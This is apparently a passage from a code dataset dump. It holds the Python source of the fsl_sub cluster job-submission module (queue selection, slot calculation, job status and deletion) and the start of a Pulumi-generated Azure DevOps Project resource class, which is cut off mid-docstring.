text stringlengths 957 885k |
|---|
<filename>fsl_sub/__init__.py
#!/usr/bin/env fslpython
# fsl_sub python module
# Copyright (c) 2018-2021, University of Oxford (<NAME>)
import datetime
import errno
import getpass
import logging
import os
import socket
import shlex
import warnings
from math import ceil
from fsl_sub.exceptions import (
BadConfiguration,
BadSubmission,
CommandError,
UnrecognisedModule,
)
from fsl_sub.coprocessors import (
max_coprocessors,
coproc_get_module,
)
from fsl_sub.config import (
read_config,
method_config,
coprocessor_config,
uses_projects,
)
import fsl_sub.consts
from fsl_sub.projects import (
get_project_env,
project_exists,
)
from fsl_sub.utils import (
load_plugins,
build_job_name,
check_command,
check_command_file,
get_plugin_qdel,
control_threads,
human_to_ram,
update_envvar_list,
)
from fsl_sub.version import VERSION
def fsl_sub_warnings_formatter(
        message, category, filename, lineno, file=None, line=None):
    '''Minimal warning formatter: emit only the warning message text.

    Replaces the default formatter (which prints file/line context) so that
    fsl_sub warnings read as plain one-line messages on the console. The
    signature matches the contract of ``warnings.formatwarning``.
    '''
    return str(message) + '\n'


# Install the minimal formatter and make sure UserWarnings are never
# de-duplicated - each occurrence should be shown to the user.
warnings.formatwarning = fsl_sub_warnings_formatter
warnings.simplefilter('always', UserWarning)
def version():
    '''Return the fsl_sub package version string.'''
    return VERSION
def report(
        job_id,
        subjob_id=None
):
    '''Request a job status. Returns a dictionary:
        id
        name
        script (if available)
        arguments (if available)
        submission_time
        tasks (dict keyed on sub-task ID):
            status:
                fsl_sub.consts.QUEUED
                fsl_sub.consts.RUNNING
                fsl_sub.consts.FINISHED
                fsl_sub.consts.FAILEDNQUEUED
                fsl_sub.consts.SUSPENDED
                fsl_sub.consts.HELD
            start_time
            end_time
            sub_time
            utime
            stime
            exit_status
            error_message
            maxmemory (in Mbytes)
        parents (if available)
        children (if available)
        job_directory (if available)
    '''
    plugins = load_plugins()
    config = read_config()

    if config['method'] == 'shell':
        # The shell plugin runs jobs synchronously, so there is no queue to
        # interrogate - return a synthetic "already finished" record.
        ntime = datetime.datetime.now()
        task_record = {
            'status': fsl_sub.consts.FINISHED,
            'start_time': ntime,
            'end_time': ntime,
            'sub_time': ntime,
            'utime': 0,
            'stime': 0,
            'exit_status': 0,
            'error_message': None,
            'maxmemory': 0,
        }
        return {
            'id': 123456,
            'name': 'nojob',
            'script': None,
            'arguments': None,
            'submission_time': ntime,
            'tasks': {'1': task_record, },
            'parents': None,
            'children': None,
            'job_directory': None,
            'fake': True,
        }

    grid_module = 'fsl_sub_plugin_' + config['method']
    if grid_module not in plugins:
        raise BadConfiguration(
            "{} not a supported method".format(config['method']))
    try:
        job_status = plugins[grid_module].job_status
    except AttributeError as e:
        raise BadConfiguration(
            "Failed to load plugin " + grid_module
            + " ({0})".format(str(e))
        )
    # Delegate the actual status lookup to the configured scheduler plugin.
    return job_status(job_id, subjob_id)
def submit(
    command,
    name=None,
    threads=1,
    queue=None,
    jobhold=None,
    array_task=False,
    array_hold=None,
    array_limit=None,
    array_specifier=None,
    parallel_env=None,
    jobram=None,
    jobtime=None,
    resources=None,
    ramsplit=True,
    priority=None,
    validate_command=True,
    mail_on=None,
    mailto="{username}@{hostname}".format(
        username=getpass.getuser(),
        hostname=socket.gethostname()),
    logdir=None,
    coprocessor=None,
    coprocessor_toolkit=None,
    coprocessor_class=None,
    coprocessor_class_strict=False,
    coprocessor_multi="1",
    usescript=False,
    architecture=None,
    requeueable=True,
    as_tuple=False,
    project=None,
    export_vars=None,
    keep_jobscript=False
):
    '''Submit job(s) to a queue, returns the job id as an int (pass as_tuple=True
    to return a single value tuple).

    Single tasks require a command in the form of a list [command, arg1,
    arg2, ...] or simple string "command arg1 arg2".

    Array tasks (array_task=True) require a file name of the array task table
    file unless array_specifier(=n[-m[:s]]) is specified in which case command
    is as per a single task.

    Requires:

    command - string or list containing command to run
                or the file name of the array task file.
                If array_specifier is given then this must be
                a string/list containing the command to run.

    Optional:
    name - Symbolic name for task (defaults to first component of command)
    array_task - is the command is an array task (defaults to False)
    jobhold - id(s) of jobs to hold for (string or list)
    array_hold - complex hold string, integer or list
    array_limit - limit concurrently scheduled array
            tasks to specified number
    array_specifier - n[-m[:s]] n subtasks or starts at n, ends at m with
            a step of s.
    as_tuple - if true then return job ID as a single value tuple
    parallel_env - parallel environment name
    jobram - RAM required by job (total of all threads)
    jobtime - time (in minutes for task)
    requeueable - job may be requeued on node failure
    resources - list of resource request strings
    ramsplit - break tasks into multiple slots to meet RAM constraints
    priority - job priority (0-1023)
    mail_on - mail user on 'a'bort or reschedule, 'b'egin, 'e'nd,
            's'uspended, 'n'o mail
    mailto - email address to receive job info
    logdir - directory to put log files in
    coprocessor - name of coprocessor required
    coprocessor_toolkit - coprocessor toolkit version
    coprocessor_class - class of coprocessor required
    coprocessor_class_strict - whether to choose only this class
            or all more capable
    coprocessor_multi - how many coprocessors you need (or
            complex description) (int or string)
    queue - Explicit queue to submit to - use jobram/jobtime in preference to
            this
    usescript - queue config is defined in script
    project - Cluster project to submit job to, defaults to None
    export_vars - list of environment variables to preserve for job
            ignored if job is copying complete environment
    keep_jobscript - whether to generate and keep a script defining the parameters
            used to run your task
    validate_command - whether to validate the command or not.
    '''
    logger = logging.getLogger(__name__)

    try:
        debugging = os.environ['FSLSUB_DEBUG'] == '1'
    except KeyError:
        debugging = False

    # Can't just have export_vars=[] in function definition as the list is
    # mutable so subsequent calls will return the updated list!
    # NOTE: this normalisation must happen *before* the debugging update below,
    # otherwise update_envvar_list would be handed None when no export_vars
    # were passed and FSLSUB_DEBUG=1 is set in the environment.
    if export_vars is None:
        export_vars = []

    if debugging:
        update_envvar_list(export_vars, 'FSLSUB_DEBUG=1')
        logger.setLevel(logging.DEBUG)

    # Work on a copy so a caller-supplied list isn't mutated by the
    # config-derived additions below.
    my_export_vars = list(export_vars)

    # Ensure FSLSUB's configuration file path is propagated to jobs
    if 'FSLSUB_CONF' in os.environ.keys():
        update_envvar_list(
            my_export_vars,
            '='.join(('FSLSUB_CONF', os.environ['FSLSUB_CONF'])))

    logger.debug("Submit called with:")
    logger.debug(
        " ".join(
            [
                str(a) for a in [
                    command, name, threads, queue, jobhold, array_task,
                    array_hold, array_limit, array_specifier, parallel_env,
                    jobram, jobtime, resources, ramsplit, priority,
                    validate_command, mail_on, mailto, logdir,
                    coprocessor, coprocessor_toolkit, coprocessor_class,
                    coprocessor_class_strict, coprocessor_multi,
                    usescript, architecture, requeueable,
                    as_tuple, project,
                ]
            ]
        )
    )

    PLUGINS = load_plugins()
    config = read_config()
    grid_module = 'fsl_sub_plugin_' + config['method']
    if grid_module not in PLUGINS:
        raise BadConfiguration(
            "{} not a supported method".format(config['method']))
    try:
        already_queued = PLUGINS[grid_module].already_queued
        qtest = PLUGINS[grid_module].qtest
    except AttributeError as e:
        raise BadConfiguration(
            "Failed to load plugin " + grid_module
            + " ({0})".format(str(e))
        )

    if config['method'] != 'shell':
        # Remember the configured method before we potentially fall back to
        # 'shell' so any warning below reports the method the user asked for.
        requested_method = config['method']
        if already_queued():
            # Nested submission from within a queued job - run via the shell
            # plugin instead of submitting a job-from-a-job.
            config['method'] = 'shell'
            warnings.warn(
                'Warning: job on queue attempted to submit more jobs -'
                'running jobs using shell plugin instead.'
            )
        config['qtest'] = qtest()
        if config['qtest'] is None:
            config['method'] = 'shell'
            warnings.warn(
                'Warning: fsl_sub configured for {0} but {0}'
                ' software not found.'.format(requested_method)
            )
    logger.debug("Configuring plugin " + config['method'])
    # Reset grid_module in case we've switched to the Shell plugin
    grid_module = 'fsl_sub_plugin_' + config['method']
    try:
        queue_submit = PLUGINS[grid_module].submit
        qtest = PLUGINS[grid_module].qtest
        queue_exists = PLUGINS[grid_module].queue_exists
        # Deliberately shadows the imported BadSubmission with the plugin's
        # own exception class so plugin-raised errors are caught uniformly.
        BadSubmission = PLUGINS[grid_module].BadSubmission
        already_queued = PLUGINS[grid_module].already_queued
    except AttributeError as e:
        raise BadConfiguration(
            "Failed to load plugin " + grid_module
            + " ({0})".format(str(e))
        )

    if isinstance(command, str) or len(command) == 1:
        # command is a basic string or single element list
        logger.debug("Simple string or single element list passed")
        if isinstance(command, list):
            command = command[0]
        if ';' not in command:
            logger.debug("String being shlex split")
            command = shlex.split(command)
        else:
            # Command is a shell one-liner, we can't reliably split this
            logger.debug("String contains ';' we cannot split it")
            command = [command]
            logger.debug("Disabling validation")
            validate_command = False
        logger.debug(command)
    elif not isinstance(command, list):
        raise BadSubmission("Command should be a list or string")

    logger.debug("Loading configuration for " + config['method'])
    mconfig = method_config(config['method'])
    logger.debug("Method configuration is " + str(mconfig))
    logger.debug(
        "Adding export_vars from config to provided list "
        + str(my_export_vars) + str(config.get('export_vars', [])))
    # Merge config-level export variables without overwriting any value the
    # caller already provided.
    for config_var in config.get('export_vars', []):
        update_envvar_list(my_export_vars, config_var, overwrite=False)

    # Remember whether the caller explicitly requested a PE - used later to
    # decide whether an auto-selected PE can be dropped for 1-thread jobs.
    parallel_env_requested = parallel_env

    if logdir is not None and logdir != "/dev/null":
        try:
            os.makedirs(logdir)
        except OSError as e:
            if e.errno != errno.EEXIST:
                raise BadSubmission(
                    "Unable to create {0} ({1})".format(
                        logdir, str(e)
                    ))
            else:
                if not os.path.isdir(logdir):
                    raise BadSubmission(
                        "Log destination is a file "
                        "(should be a folder)")

    if jobram is None:
        # Allow the environment to provide a default memory requirement.
        try:
            mem_requested = human_to_ram(
                os.environ['FSLSUB_MEMORY_REQUIRED'],
                fsl_sub.consts.RAMUNITS,
                as_int=True)
        except KeyError:
            pass
        except ValueError:
            # logger.warn is a deprecated alias - use warning()
            logger.warning(
                "FSLSUB_MEMORY_REQUIRED variable doesn't make sense")
        else:
            jobram = mem_requested

    if mconfig['mail_support'] is True:
        if mail_on is None:
            try:
                mail_on = mconfig['mail_mode']
            except KeyError:
                warnings.warn(
                    "Mail not configured but enabled in configuration for "
                    + config['method'])
        else:
            # Mail modes is a dictionary
            if mail_on not in mconfig['mail_modes']:
                raise BadSubmission(
                    "Unrecognised mail mode " + mail_on)

    # For simple numbers pass these in as list, if they are strings
    # then leave them alone
    if jobhold is not None:
        if not isinstance(jobhold, (str, int, list, tuple)):
            raise BadSubmission(
                "jobhold must be a string, int, list or tuple")
    if array_hold is not None:
        if not isinstance(array_hold, (str, int, list, tuple)):
            raise BadSubmission(
                "array_hold must be a string, int, list or tuple")

    validate_type = 'command'
    if array_task is False:
        job_type = 'single'
        if (
                array_hold is not None
                or array_limit is not None
                or array_specifier is not None):
            raise BadSubmission(
                "Array controls not applicable to non-array tasks")
    elif array_specifier is None:
        job_type = 'array file'
        validate_type = 'array'
    else:
        job_type = 'array aware command'
        validate_type = 'command'
    logger.info(
        "METHOD={0} : TYPE={1} : args={2}".format(
            config['method'],
            job_type,
            " ".join(command)
        ))

    if validate_command:
        if validate_type == 'array':
            try:
                check_command_file(command[0])
            except CommandError as e:
                raise BadSubmission(
                    "Array task definition file fault: " + str(e)
                )
        elif validate_type == 'command':
            if usescript is False:
                try:
                    check_command(command[0])
                except CommandError as e:
                    raise BadSubmission(
                        "Command not usable: " + str(e)
                    )
            else:
                if not os.path.exists(command[0]):
                    raise BadSubmission(
                        "Script file not found"
                    )
        else:
            raise BadConfiguration(
                "Unknown validation type: " + validate_type)

    if name is None:
        task_name = build_job_name(command)
        logger.debug("No name passed - setting to " + task_name)
    else:
        task_name = name

    if mconfig['queues'] is False:
        # Method has no queues (e.g. shell) - nothing to select or split.
        queue = None
        split_on_ram = None
    else:
        split_on_ram = mconfig.get('map_ram', True) and ramsplit

        if (split_on_ram
                and parallel_env is None
                and 'large_job_split_pe' in mconfig):
            parallel_env = mconfig['large_job_split_pe']

        if queue is None:
            queue_details = getq_and_slots(
                job_time=jobtime,
                job_ram=jobram,
                job_threads=threads,
                queues=config['queues'],
                coprocessor=coprocessor,
                ll_env=parallel_env
            )
            logger.debug("Automatic queue selection:")
            logger.debug(queue_details)
            (queue, slots_required) = queue_details
        else:
            if not queue_exists(queue):
                raise BadSubmission("Unrecognised queue " + queue)
            logger.debug("Specific queue: " + queue)
            slots_required = _slots_required(
                queue, jobram, config['queues'], threads)

        threads = max(slots_required, threads)
        control_threads(
            config['thread_control'], threads, add_to_list=my_export_vars)

        if threads == 1 and parallel_env_requested is None:
            parallel_env = None
        if threads > 1 and parallel_env is None:
            raise BadSubmission(
                "Job requires {} slots but no parallel envrionment "
                "available or requested".format(threads))
        if (threads > 1
                and mconfig.get('thread_ram_divide', False)
                and not split_on_ram):
            split_on_ram = True

    if coprocessor:
        if mconfig['queues']:
            # If coprocessor resource is in Scheduling multiple GPUS...
            # PE as first port of call, do we need a separate way of
            # specifying gpu qty
            if isinstance(coprocessor_multi, int):
                coprocessor_multi = str(coprocessor_multi)
            if coprocessor_multi != '1':
                try:
                    if int(coprocessor_multi) > max_coprocessors(coprocessor):
                        raise BadSubmission(
                            "Unable to provide {} coprocessors for job".format(
                                coprocessor_multi
                            ))
                except ValueError:
                    # Complex coprocessor_multi passed - do not validate
                    pass
                usepe = coprocessor_config(coprocessor).get('uses_pe', False)
                if usepe:
                    try:
                        if usepe not in (
                                config['queues'][queue]['parallel_envs']):
                            raise KeyError()
                    except KeyError:
                        raise BadSubmission(
                            "uses_pe set but selected queue {0} does not "
                            "have PE {1} configured".format(
                                queue, usepe
                            ))
                    parallel_env = usepe
                    try:
                        gpus_req = int(coprocessor_multi)
                    except ValueError:
                        raise BadSubmission(
                            "Specified coprocessor_multi argument is a "
                            "complex value but cluster "
                            "configured with 'uses_pe' which requires a "
                            "simple integer"
                        )
                    if gpus_req > threads:
                        if gpus_req > config['queues'][queue]['max_slots']:
                            raise BadSubmission(
                                "More GPUs than queue slots have been "
                                "requested")
                        threads = gpus_req
                        control_threads(
                            config['thread_control'],
                            threads,
                            add_to_list=my_export_vars)
        if coprocessor_toolkit:
            logger.debug("Looking for coprocessor toolkit")
            logger.debug(":".join((coprocessor, coprocessor_toolkit)))
            try:
                coproc_get_module(coprocessor, coprocessor_toolkit)
            except UnrecognisedModule as e:
                raise BadSubmission(
                    "Unable to load coprocessor toolkit " + str(e)
                )

    if uses_projects():
        q_project = get_project_env(project)
        if q_project is not None and not project_exists(q_project):
            raise BadSubmission(
                "Project not recognised"
            )
    else:
        q_project = None

    logger.debug(
        "Calling queue_submit fsl_sub_plugin_{0} with: ".format(
            config['method']))
    logger.debug(
        ", ".join(
            [str(a) for a in [
                command, task_name, queue, jobhold, array_task,
                array_hold, array_limit, array_specifier, parallel_env,
                jobram, jobtime, resources, ramsplit, priority,
                mail_on, mailto, logdir, coprocessor, coprocessor_toolkit,
                coprocessor_class, coprocessor_class_strict,
                coprocessor_multi,
                usescript, architecture, requeueable]]))
    job_id = queue_submit(
        command,
        job_name=task_name,
        threads=threads,
        queue=queue,
        jobhold=jobhold,
        array_task=array_task,
        array_hold=array_hold,
        array_limit=array_limit,
        array_specifier=array_specifier,
        parallel_env=parallel_env,
        jobram=jobram,
        jobtime=jobtime,
        resources=resources,
        ramsplit=split_on_ram,
        priority=priority,
        mail_on=mail_on,
        mailto=mailto,
        logdir=logdir,
        coprocessor=coprocessor,
        coprocessor_toolkit=coprocessor_toolkit,
        coprocessor_class=coprocessor_class,
        coprocessor_class_strict=coprocessor_class_strict,
        coprocessor_multi=coprocessor_multi,
        usescript=usescript,
        architecture=architecture,
        requeueable=requeueable,
        project=q_project,
        export_vars=my_export_vars,
        keep_jobscript=keep_jobscript
    )

    if as_tuple:
        return (job_id, )
    else:
        return job_id
def _slots_required(q_name, jobram, qconfig, threads):
    '''Return the slot count needed to run a job on the named queue.

    Strips any @host suffixes from (possibly comma-separated) queue names
    before looking the queue up in the configuration; unknown queues
    default to a single slot.
    '''
    log = logging.getLogger(__name__)
    if '@' in q_name:
        log.debug("q@host requested, removing @host from all queues")
        q_name = ','.join(part.split('@')[0] for part in q_name.split(','))
    if q_name not in qconfig:
        log.debug("queue definition not found, defaulting to single slot")
        return 1
    return calc_slots(
        jobram,
        qconfig[q_name]['slot_size'],
        threads)
def calc_slots(job_ram, slot_size, job_threads):
    '''Calculate how many slots would be necessary to
    provide this job request.

    job_ram - RAM requested (0/None means "no RAM constraint")
    slot_size - RAM per queue slot (None means queue has no slot sizing)
    job_threads - number of threads the job will run

    Returns the larger of the RAM-derived slot count and the thread count,
    never less than 1.
    '''
    logger = logging.getLogger(__name__)
    logger.debug(
        "Calc slots based on JR:SS:JT - {0}:{1}:{2}".format(
            job_ram, slot_size, job_threads
        ))
    if job_ram == 0 or job_ram is None:
        return max(1, job_threads)
    if slot_size is not None:
        return max(int(ceil(job_ram / slot_size)), job_threads)
    return job_threads


def getq_and_slots(
        queues, job_time=0, job_ram=0,
        job_threads=1, coprocessor=None,
        ll_env=None):
    '''Calculate which queue to run the job on. job_time is in minutes,
    job_ram in units given in configuration.
    Still needs job splitting across slots.

    Returns a (queue_name, slots_required) tuple.
    Raises BadSubmission if no queue satisfies the request.

    NOTE: mutates the passed-in queues dict - missing 'group'/'priority'
    keys are filled in with defaults during selection.
    '''
    logger = logging.getLogger(__name__)
    if job_ram is None:
        job_ram = 0
    queue_list = list(queues.keys())
    if not queue_list:
        raise BadSubmission("No queues found")

    # Filter on coprocessor availability
    if coprocessor is not None:
        queue_list = [
            q for q in queue_list if 'copros' in queues[q]
            and coprocessor in queues[q]['copros']]
        if not queue_list:
            raise BadSubmission("No queues with requested co-processor found")
    else:
        # No coprocessor requested: drop queues whose coprocessors are all
        # exclusive (those queues only accept coprocessor jobs).
        tq = []
        for q in queue_list:
            qd = queues[q]
            if 'copros' not in qd:
                tq.append(q)
            else:
                qdcp = qd['copros']
                if not all([qdcp[c].get('exclusive', True) for c in qdcp]):
                    tq.append(q)
        queue_list = tq
        if not queue_list:
            raise BadSubmission(
                "No queues found without co-processors defined that are "
                "non-exclusive")

    # Filter on parallel environment availability
    if ll_env is not None:
        queue_list = [
            q for q in queue_list if 'parallel_envs' in queues[q]
            and ll_env in queues[q]['parallel_envs']
        ]
        if not queue_list:
            raise BadSubmission(
                "No queues with requested parallel environment found")

    # If no job time was specified then find the default queues
    # (if defined)
    if job_time is None or job_time == 0:
        d_queues = [
            q for q in queue_list if 'default' in queues[q]
        ]
        if d_queues:
            queue_list = d_queues
        job_time = 0
    slots = {}
    for index, q in enumerate(queue_list):
        slots[q] = calc_slots(
            job_ram, queues[q]['slot_size'], job_threads)
        # If group/priority not specified then create pseudo-groups,
        # one for each queue
        if 'group' not in queues[q].keys():
            queues[q]['group'] = index
        if 'priority' not in queues[q].keys():
            queues[q]['priority'] = 1
    # Stable double-sort: highest priority first, then by (group, slots)
    # so within a group the queue needing fewest slots wins.
    queue_list.sort(key=lambda x: queues[x]['priority'], reverse=True)
    queue_list.sort(key=lambda x: (queues[x]['group'], slots[x]))
    ql = [
        q for q in queue_list if queues[q]['time'] >= job_time
        and queues[q]['max_size'] >= job_ram
        and queues[q]['max_slots'] >= job_threads]
    if not ql:
        raise BadSubmission(
            "No queues matching time/RAM/thread requirements found")

    logger.info(
        "Estimated RAM was {0} GBm, runtime was {1} minutes.\n".format(
            job_ram, job_time
        ))
    if coprocessor:
        logger.info("Co-processor {} was requested".format(coprocessor))
    # ql is guaranteed non-empty here (we raised above otherwise), so the
    # original trailing len()/IndexError guards were dead code.
    logger.info(
        "Appropriate queue is {}".format(ql[0]))
    return (ql[0], slots[ql[0]])
def delete_job(job_id):
    '''Attempt to kill a job (either cluster or shell).

    Resolves the configured scheduler plugin and dispatches its qdel
    implementation; falls back to the shell plugin when called from
    within an already-queued job.
    '''
    plugins = load_plugins()
    config = read_config()
    method = config['method']
    grid_module = 'fsl_sub_plugin_' + method
    if grid_module not in plugins:
        raise BadConfiguration(
            "{} not a supported method".format(method))
    try:
        already_queued = plugins[grid_module].already_queued
    except AttributeError as e:
        raise BadConfiguration(
            "Failed to load plugin " + grid_module
            + " ({0})".format(str(e))
        )
    # Inside a queued job the work was run by the shell plugin, so the
    # kill must be routed there too.
    if already_queued():
        method = 'shell'
    return get_plugin_qdel(method)(job_id)
|
<gh_stars>10-100
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
__all__ = ['ProjectArgs', 'Project']
# NOTE(review): this class is emitted by the Pulumi Terraform Bridge (tfgen);
# any manual change will be lost on regeneration - comments only here.
@pulumi.input_type
class ProjectArgs:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 version_control: Optional[pulumi.Input[str]] = None,
                 visibility: Optional[pulumi.Input[str]] = None,
                 work_item_template: Optional[pulumi.Input[str]] = None):
        """
        The set of arguments for constructing a Project resource.
        :param pulumi.Input[str] description: The Description of the Project.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
               Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
        :param pulumi.Input[str] name: The Project Name.
        :param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
        :param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
        :param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
        """
        # Only explicitly-provided arguments are forwarded so pulumi can tell
        # "unset" apart from "set to None".
        if description is not None:
            pulumi.set(__self__, "description", description)
        if features is not None:
            pulumi.set(__self__, "features", features)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if version_control is not None:
            pulumi.set(__self__, "version_control", version_control)
        if visibility is not None:
            pulumi.set(__self__, "visibility", visibility)
        if work_item_template is not None:
            pulumi.set(__self__, "work_item_template", work_item_template)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The Description of the Project.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def features(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Defines the status (`enabled`, `disabled`) of the project features.
        Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
        """
        return pulumi.get(self, "features")

    @features.setter
    def features(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "features", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The Project Name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    # Getter name differs from the attribute: the provider wire protocol
    # uses camelCase ("versionControl").
    @property
    @pulumi.getter(name="versionControl")
    def version_control(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
        """
        return pulumi.get(self, "version_control")

    @version_control.setter
    def version_control(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version_control", value)

    @property
    @pulumi.getter
    def visibility(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
        """
        return pulumi.get(self, "visibility")

    @visibility.setter
    def visibility(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "visibility", value)

    @property
    @pulumi.getter(name="workItemTemplate")
    def work_item_template(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
        """
        return pulumi.get(self, "work_item_template")

    @work_item_template.setter
    def work_item_template(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "work_item_template", value)
# NOTE(review): generated by the Pulumi Terraform Bridge (tfgen); unlike
# ProjectArgs this state class also carries the provider-computed
# process_template_id output property - comments only here.
@pulumi.input_type
class _ProjectState:
    def __init__(__self__, *,
                 description: Optional[pulumi.Input[str]] = None,
                 features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 name: Optional[pulumi.Input[str]] = None,
                 process_template_id: Optional[pulumi.Input[str]] = None,
                 version_control: Optional[pulumi.Input[str]] = None,
                 visibility: Optional[pulumi.Input[str]] = None,
                 work_item_template: Optional[pulumi.Input[str]] = None):
        """
        Input properties used for looking up and filtering Project resources.
        :param pulumi.Input[str] description: The Description of the Project.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
               Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
        :param pulumi.Input[str] name: The Project Name.
        :param pulumi.Input[str] process_template_id: The Process Template ID used by the Project.
        :param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
        :param pulumi.Input[str] visibility: Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
        :param pulumi.Input[str] work_item_template: Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
        """
        # Only explicitly-provided arguments are forwarded so pulumi can tell
        # "unset" apart from "set to None".
        if description is not None:
            pulumi.set(__self__, "description", description)
        if features is not None:
            pulumi.set(__self__, "features", features)
        if name is not None:
            pulumi.set(__self__, "name", name)
        if process_template_id is not None:
            pulumi.set(__self__, "process_template_id", process_template_id)
        if version_control is not None:
            pulumi.set(__self__, "version_control", version_control)
        if visibility is not None:
            pulumi.set(__self__, "visibility", visibility)
        if work_item_template is not None:
            pulumi.set(__self__, "work_item_template", work_item_template)

    @property
    @pulumi.getter
    def description(self) -> Optional[pulumi.Input[str]]:
        """
        The Description of the Project.
        """
        return pulumi.get(self, "description")

    @description.setter
    def description(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "description", value)

    @property
    @pulumi.getter
    def features(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
        """
        Defines the status (`enabled`, `disabled`) of the project features.
        Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
        """
        return pulumi.get(self, "features")

    @features.setter
    def features(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
        pulumi.set(self, "features", value)

    @property
    @pulumi.getter
    def name(self) -> Optional[pulumi.Input[str]]:
        """
        The Project Name.
        """
        return pulumi.get(self, "name")

    @name.setter
    def name(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "name", value)

    # Getter names below differ from the attributes: the provider wire
    # protocol uses camelCase property names.
    @property
    @pulumi.getter(name="processTemplateId")
    def process_template_id(self) -> Optional[pulumi.Input[str]]:
        """
        The Process Template ID used by the Project.
        """
        return pulumi.get(self, "process_template_id")

    @process_template_id.setter
    def process_template_id(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "process_template_id", value)

    @property
    @pulumi.getter(name="versionControl")
    def version_control(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
        """
        return pulumi.get(self, "version_control")

    @version_control.setter
    def version_control(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "version_control", value)

    @property
    @pulumi.getter
    def visibility(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the visibility of the Project. Valid values: `private` or `public`. Defaults to `private`.
        """
        return pulumi.get(self, "visibility")

    @visibility.setter
    def visibility(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "visibility", value)

    @property
    @pulumi.getter(name="workItemTemplate")
    def work_item_template(self) -> Optional[pulumi.Input[str]]:
        """
        Specifies the work item template. Valid values: `Agile`, `Basic`, `CMMI` or `Scrum`. Defaults to `Agile`.
        """
        return pulumi.get(self, "work_item_template")

    @work_item_template.setter
    def work_item_template(self, value: Optional[pulumi.Input[str]]):
        pulumi.set(self, "work_item_template", value)
class Project(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
description: Optional[pulumi.Input[str]] = None,
features: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
name: Optional[pulumi.Input[str]] = None,
version_control: Optional[pulumi.Input[str]] = None,
visibility: Optional[pulumi.Input[str]] = None,
work_item_template: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
Manages a project within Azure DevOps.
## Example Usage
```python
import pulumi
import pulumi_azuredevops as azuredevops
project = azuredevops.Project("project",
description="Test Project Description",
features={
"artifacts": "disabled",
"testplans": "disabled",
},
version_control="Git",
visibility="private",
work_item_template="Agile")
```
## Relevant Links
- [Azure DevOps Service REST API 5.1 - Projects](https://docs.microsoft.com/en-us/rest/api/azure/devops/core/projects?view=azure-devops-rest-5.1)
## PAT Permissions Required
- **Project & Team**: Read, Write, & Manage
## Import
Azure DevOps Projects can be imported using the project name or by the project Guid, e.g.
```sh
$ pulumi import azuredevops:index/project:Project project "Test Project"
```
or
```sh
$ pulumi import azuredevops:index/project:Project project 00000000-0000-0000-0000-000000000000
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] description: The Description of the Project.
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] features: Defines the status (`enabled`, `disabled`) of the project features.
Valid features are `boards`, `repositories`, `pipelines`, `testplans`, `artifacts`
:param pulumi.Input[str] name: The Project Name.
:param pulumi.Input[str] version_control: Specifies the version control system. Valid values: `Git` or `Tfvc`. Defaults to `Git`.
